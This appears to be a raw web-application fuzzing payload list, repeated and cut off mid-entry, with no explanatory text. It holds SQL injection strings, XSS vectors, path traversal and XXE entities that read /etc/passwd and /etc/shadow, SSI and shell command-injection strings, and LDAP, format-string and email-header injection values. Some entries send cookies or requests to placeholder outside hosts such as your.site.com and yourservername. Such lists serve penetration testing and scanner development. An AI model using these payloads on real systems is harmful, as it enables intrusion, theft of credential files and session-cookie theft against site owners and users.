ping -i 30 127.0.0.1 %0a %oa ping -n 30 127.0.0.1 %0a %0a id %0a %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+youremail%0aRCPT+TO:+youremail%0aDATA%0aFrom:+youremail%0aTo:+youremail%0aSubject:+tst%0afoo%0a%2e%0a %0d %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+youremail%0d%0aRCPT+TO:+youremail%0d%0aDATA%0d%0aFrom:+youremail%0d%0aTo:+youremail%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a %0d%0aX-Injection-Header:%20AttackValue %20 %20$(sleep%2050) %20'sleep%2050' %20d %20n %20s %20x %20| %21 %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 %2500 %250a %26 %27%20or%201=1 %28 %29 %2A %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 %2A%7C %2C %2e%2e%2f %3C %3C%3F %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E %3cscript%3ealert("XSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %5C %5C/ %60 %7C %7f %99999999999s %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f %ff %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p %s%p%x%d %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x & & id & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & &#0000060 < &#000060 < &#00060 < &#0060 < &#060 < 
 

 
 
 &#60 < &#X000003C < &#X000003c < &#X00003C < &#X00003c < &#X0003C < &#X0003c < &#X003C < &#X003c < &#X03C < &#X03c < &#X3C < &#X3c < &#x000003C < &#x000003c < &#x00003C < &#x00003c < &#x0003C < &#x0003c < &#x003C < &#x003c < &#x03C < &#x03c < &#x3C < &#x3c < &LT < ' '%20OR &id &lt < <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> <!--#exec%20cmd="/usr/bin/id;--> <>"'%;)(&+ &ltscript&gtalert(document.cookie);&ltscript&gtalert &ltscript&gtalert(document.cookie);/script ";id" ' ' (select top 1 ' -- ' ; ' UNION ALL SELECT ' UNION SELECT ' or ''=' ' or '1'='1 ' or '1'='1'-- ' or 'x'='x ' or (EXISTS) ' or 0=0 # ' or 0=0 -- ' or 1 in (@@version)-- ' or 1=1 or ''=' ' or 1=1-- ' or a=a-- ' or uid like '% ' or uname like '% ' or user like '% ' or userid like '% ' or username like '% '%20or%201=1 '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E '';!--"XSS=&{()} ') or ('a'='a '-- '; exec master..xp_cmdshell '; exec xp_regread '; waitfor delay '0:30:0'-- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))///SCRIPT!--SCRIPTalert(String.fromCharCode(88,83,83))/SCRIPT=&{} ';shutdown-- 'scriptalert(document.cookie);/script 'scriptalert(document.cookie)/script 'hi' or 'x'='x'; 'or select * 'sqlattempt1 '||UTL_HTTP.REQUEST '||Utl_Http.request('http://yourservername') from dual-- ( (') (sqlattempt2) ) )))))))))) * *' *' *(|(mail=*)) *(|(objectclass=*)) */* *| + +%00 ,@variable - -- --'; --sp_password -1 -1.0 -2 -20 -268435455 ..%%35%63 ..%%35c ..%25%35%63 ..%255c ..%5c ..%bg%qf ..%c0%af ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini ..%u2215 ..%u2216 ../ ../../../../../../../../../../../../etc/hosts ../../../../../../../../../../../../etc/hosts%00 ../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../etc/shadow ../../../../../../../../../../../../etc/shadow%00 ..\ ..\..\..\..\..\..\..\..\..\..\etc\passwd ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 ..\..\..\..\..\..\..\..\..\..\etc\shadow ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow / /%00/ /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 /%2A /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow /' /' /,%ENV,/ /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow /.../.../.../.../.../ /../../../../../../../../%2A /../../../../../../../../../../../etc/passwd%00.html /../../../../../../../../../../../etc/passwd%00.jpg /../../../../../../../../../../etc/passwd /../../../../../../../../../../etc/passwd^^ /../../../../../../../../../../etc/shadow /../../../../../../../../../../etc/shadow^^ /../../../../../../../../bin/id| /..\../..\../..\../..\../..\../..\../boot.ini /..\../..\../..\../..\../..\../..\../etc/passwd /..\../..\../..\../..\../..\../..\../etc/shadow /./././././././././././etc/passwd /./././././././././././etc/shadow // //* /etc/passwd /etc/shadow /index.html|id| 0 0 or 1=1 00 0xfffffff 1 1 or 1 in (@@version)-- 1 or 1=1-- 1.0 1; waitfor delay '0:30:0'-- 1;SELECT%20* 1||Utl_Http.request('http://yourservername') from dual-- 2 2147483647 268435455 65536 :response.write 111111 ; ; ping 127.0.0.1 ; ;/usr/bin/id\n ;echo 111111 ;id ;id; ;id\n ;id| ;ls -la ;system('/usr/bin/id') ;system('cat%20/etc/passwd') ;system('id') ;|/usr/bin/id| script / script ! ![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]] ![CDATA[scriptvar n=0;while(true){n++;}/script]] /foo scriptalert("XSS");///script "'%;)(&+ ? ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////dev/random"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////etc/passwd"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////etc/shadow"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file://c:/boot.ini"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?foo![CDATA[' or 1=1 or ''=']]/foo ?xml version="1.0" encoding="ISO-8859-1"?foo![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]]/foo HTML xmlns:xss?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"xss:xssXSS/xss:xss/HTML IMG """SCRIPTalert("XSS")/SCRIPT" IMG DYNSRC="javascript:alert('XSS')" IMG LOWSRC="javascript:alert('XSS')" IMG SRC="  javascript:alert('XSS');" IMG SRC="jav ascript:alert('XSS');" IMG SRC="jav	ascript:alert('XSS');" IMG SRC="jav
ascript:alert('XSS');" IMG SRC="jav
ascript:alert('XSS');" IMG SRC="javascript:alert('XSS')" IMG SRC="javascript:alert('XSS');" IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041 IMG SRC=javascript:alert('XSS') IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29 IMG SRC=JaVaScRiPt:alert('XSS') IMG SRC=`javascript:alert("'XSS'")` IMG SRC=javascript:alert("XSS") IMG SRC=javascript:alert('XSS') IMG SRC=javascript:alert(String.fromCharCode(88,83,83)) IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)' IMG%20SRC='javasc ript:alert(document.cookie)' IMG%20SRC='javascript:alert(document.cookie)' foo/foo name','')); phpinfo(); exit;/*/name scriptalert("XSS")/script scriptalert(document.cookie)/script xml ID="xss"IB<IMG SRC="javas!-- --cript:alert('XSS')">/B/I/xmlSPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"/SPAN/C/X/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN xml ID=IXC![CDATA[IMG SRC="javas]]![CDATA[cript:alert('XSS');"]] xml SRC="xsstest.xml" ID=I/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN xssscriptalert('XSS')/script/vulnerable youremail%0aBcc:youremail youremail%0aCc:youremail youremail%0d%0aBcc:youremail youremail%0d%0aCc:youremail = =' =-- =; ?x= ?x=" ?x= ?x=| @' @' @* @variable A ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x| FALSE NULL PRINT PRINT @@variable TRUE XXXXX.%p XXXXX`perl -e 'print ".%p" x 80'` ['] ['] \ \";alert('XSS');// \"blah \' \' \..\..\..\..\..\..\..\..\..\..\etc\passwd \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 \..\..\..\..\..\..\..\..\..\..\etc\shadow \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 \0 \00 \00\00 \00\00\00 \0\0 \0\0\0 \\ \\'/bin/cat%20/etc/passwd\\' \\'/bin/cat%20/etc/shadow\\' \\/ \\\\* \\\\?\\ \n/bin/ls -al\n \n/usr/bin/id; \n/usr/bin/id\n \n/usr/bin/id| \nid; \nid\n \nid| \nnetstat -a%\n \t \u003C \u003c \x23 \x27 \x27UNION SELECT \x27\x4F\x52 SELECT * \x27\x6F\x72 SELECT * \x3C \x3D \x27 \x3D \x3B' \x3c ^' ^' ` `/usr/bin/id` `dir` `id` `perl -e 'print ".%p" x 80'`%n `ping 127.0.0.1` a);/usr/bin/id a);/usr/bin/id; a);/usr/bin/id| a);id a);id; a);id| a)|/usr/bin/id a)|/usr/bin/id; a)|id a)|id; a;/usr/bin/id a;/usr/bin/id; a;/usr/bin/id| a;id a;id; a;id| http://yourservername/ id%00 id%00| insert like limit null or or 0=0 # or 0=0 -- or 1=1-- or%201=1 or%201=1 -- response.write 111111 something%00html update x' or 1=1 or 'x'='y x' or name()='username' or 'x'='y xsstest xsstest%00"' {'} |/usr/bin/id |/usr/bin/id| |id |id; |id| |ls |ls -la |nid\n |usr/bin/id\n || || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & ||/usr/bin/id; ||/usr/bin/id| } ! !' !@#$%%^#$%#$@#$%$$@#$%^^**(() !@#0%^#0##018387@#0^^**(() " " or "a"="a " or "x"="x " or 0=0 # " or 0=0 -- " or 1=1 or ""=" " or 1=1-- "' or 1 --'" ") or ("a"="a "?xml version=""1.0"" encoding=""ISO-8859-1""?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM ""file:////dev/random""]foo&xxe;/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM ""file:////etc/passwd""]foo&xxe;/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?foo![CDATA[' or 1=1 or ''=']]/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?foo![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]]/foo" "HTML xmlns:xss?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""xss:xssXSS/xss:xss/HTML" "xml ID=""xss""IBIMG SRC=""javas!-- --cript:alert('XSS')""/B/I/xmlSPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""/SPAN/C/X/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN" "xml ID=IXC![CDATA[IMG SRC=""javas]]![CDATA[cript:alert('XSS');""]]" "script" "scriptalert(1)/script "scriptdocument.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie/script "xxxPyyy "\t" # #' #' #xA #xA#xD #xD #xD#xA $NULL $null % %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% %00 %00../../../../../../etc/passwd %00../../../../../../etc/shadow %00/ %00/etc/passwd%00 %01%02%03%04%0a%0d%0aADSF %08x %0A/usr/bin/id %0A/usr/bin/id%0A %0Aid %0Aid%0A %0a ping -i 30 127.0.0.1 %0a %oa ping -n 30 127.0.0.1 %0a %0a id %0a %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+youremail%0aRCPT+TO:+youremail%0aDATA%0aFrom:+youremail%0aTo:+youremail%0aSubject:+tst%0afoo%0a%2e%0a %0d %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+youremail%0d%0aRCPT+TO:+youremail%0d%0aDATA%0d%0aFrom:+youremail%0d%0aTo:+youremail%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a %0d%0aX-Injection-Header:%20AttackValue %20 %20$(sleep%2050) %20'sleep%2050' %20d %20n %20s %20x %20| %21 %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 %2500 %250a %26 %27%20or%201=1 %28 %29 %2A %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 %2A%7C %2C %2e%2e%2f %3C %3C%3F %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E %3cscript%3ealert("XSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %5C %5C/ %60 %7C %7f %99999999999s %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f %ff %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p %s%p%x%d %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x & & id & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & &#0000060 < &#000060 < &#00060 < &#0060 < &#060 < 
 

 
 
 &#60 < &#X000003C < &#X000003c < &#X00003C < &#X00003c < &#X0003C < &#X0003c < &#X003C < &#X003c < &#X03C < &#X03c < &#X3C < &#X3c < &#x000003C < &#x000003c < &#x00003C < &#x00003c < &#x0003C < &#x0003c < &#x003C < &#x003c < &#x03C < &#x03c < &#x3C < &#x3c < &LT < ' '%20OR &id &lt < <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> <!--#exec%20cmd="/usr/bin/id;--> <>"'%;)(&+ &ltscript&gtalert(document.cookie);&ltscript&gtalert &ltscript&gtalert(document.cookie);/script ";id" ' ' (select top 1 ' -- ' ; ' UNION ALL SELECT ' UNION SELECT ' or ''=' ' or '1'='1 ' or '1'='1'-- ' or 'x'='x ' or (EXISTS) ' or 0=0 # ' or 0=0 -- ' or 1 in (@@version)-- ' or 1=1 or ''=' ' or 1=1-- ' or a=a-- ' or uid like '% ' or uname like '% ' or user like '% ' or userid like '% ' or username like '% '%20or%201=1 '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E '';!--"XSS=&{()} ') or ('a'='a '-- '; exec master..xp_cmdshell '; exec xp_regread '; waitfor delay '0:30:0'-- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))///SCRIPT!--SCRIPTalert(String.fromCharCode(88,83,83))/SCRIPT=&{} ';shutdown-- 'scriptalert(document.cookie);/script 'scriptalert(document.cookie)/script 'hi' or 'x'='x'; 'or select * 'sqlattempt1 '||UTL_HTTP.REQUEST '||Utl_Http.request('http://yourservername') from dual-- ( (') (sqlattempt2) ) )))))))))) * *' *' *(|(mail=*)) *(|(objectclass=*)) */* *| + +%00 ,@variable - -- --'; --sp_password -1 -1.0 -2 -20 -268435455 ..%%35%63 ..%%35c ..%25%35%63 ..%255c ..%5c ..%bg%qf ..%c0%af ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini ..%u2215 ..%u2216 ../ ../../../../../../../../../../../../etc/hosts ../../../../../../../../../../../../etc/hosts%00 ../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../etc/shadow ../../../../../../../../../../../../etc/shadow%00 ..\ ..\..\..\..\..\..\..\..\..\..\etc\passwd ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 ..\..\..\..\..\..\..\..\..\..\etc\shadow ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow / /%00/ /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 /%2A /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow /' /' /,%ENV,/ /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow /.../.../.../.../.../ /../../../../../../../../%2A /../../../../../../../../../../../etc/passwd%00.html /../../../../../../../../../../../etc/passwd%00.jpg /../../../../../../../../../../etc/passwd /../../../../../../../../../../etc/passwd^^ /../../../../../../../../../../etc/shadow /../../../../../../../../../../etc/shadow^^ /../../../../../../../../bin/id| /..\../..\../..\../..\../..\../..\../boot.ini /..\../..\../..\../..\../..\../..\../etc/passwd /..\../..\../..\../..\../..\../..\../etc/shadow /./././././././././././etc/passwd /./././././././././././etc/shadow // //* /etc/passwd /etc/shadow /index.html|id| 0 0 or 1=1 00 0xfffffff 1 1 or 1 in (@@version)-- 1 or 1=1-- 1.0 1; waitfor delay '0:30:0'-- 1;SELECT%20* 1||Utl_Http.request('http://yourservername') from dual-- 2 2147483647 268435455 65536 :response.write 111111 ; ; ping 127.0.0.1 ; ;/usr/bin/id\n ;echo 111111 ;id ;id; ;id\n ;id| ;ls -la ;system('/usr/bin/id') ;system('cat%20/etc/passwd') ;system('id') ;|/usr/bin/id| script / script ! ![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]] ![CDATA[scriptvar n=0;while(true){n++;}/script]] /foo scriptalert("XSS");///script "'%;)(&+ ? ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////dev/random"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////etc/passwd"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////etc/shadow"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file://c:/boot.ini"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?foo![CDATA[' or 1=1 or ''=']]/foo ?xml version="1.0" encoding="ISO-8859-1"?foo![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]]/foo HTML xmlns:xss?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"xss:xssXSS/xss:xss/HTML IMG """SCRIPTalert("XSS")/SCRIPT" IMG DYNSRC="javascript:alert('XSS')" IMG LOWSRC="javascript:alert('XSS')" IMG SRC="  javascript:alert('XSS');" IMG SRC="jav ascript:alert('XSS');" IMG SRC="jav	ascript:alert('XSS');" IMG SRC="jav
ascript:alert('XSS');" IMG SRC="jav
ascript:alert('XSS');" IMG SRC="javascript:alert('XSS')" IMG SRC="javascript:alert('XSS');" IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041 IMG SRC=javascript:alert('XSS') IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29 IMG SRC=JaVaScRiPt:alert('XSS') IMG SRC=`javascript:alert("'XSS'")` IMG SRC=javascript:alert("XSS") IMG SRC=javascript:alert('XSS') IMG SRC=javascript:alert(String.fromCharCode(88,83,83)) IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)' IMG%20SRC='javasc ript:alert(document.cookie)' IMG%20SRC='javascript:alert(document.cookie)' foo/foo name','')); phpinfo(); exit;/*/name scriptalert("XSS")/script scriptalert(document.cookie)/script xml ID="xss"IB<IMG SRC="javas!-- --cript:alert('XSS')">/B/I/xmlSPAN DATASRC="#xss" DATAFLD="B" 